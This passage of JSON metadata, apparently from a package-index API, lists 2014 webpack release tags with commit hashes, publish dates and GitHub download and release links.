id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependen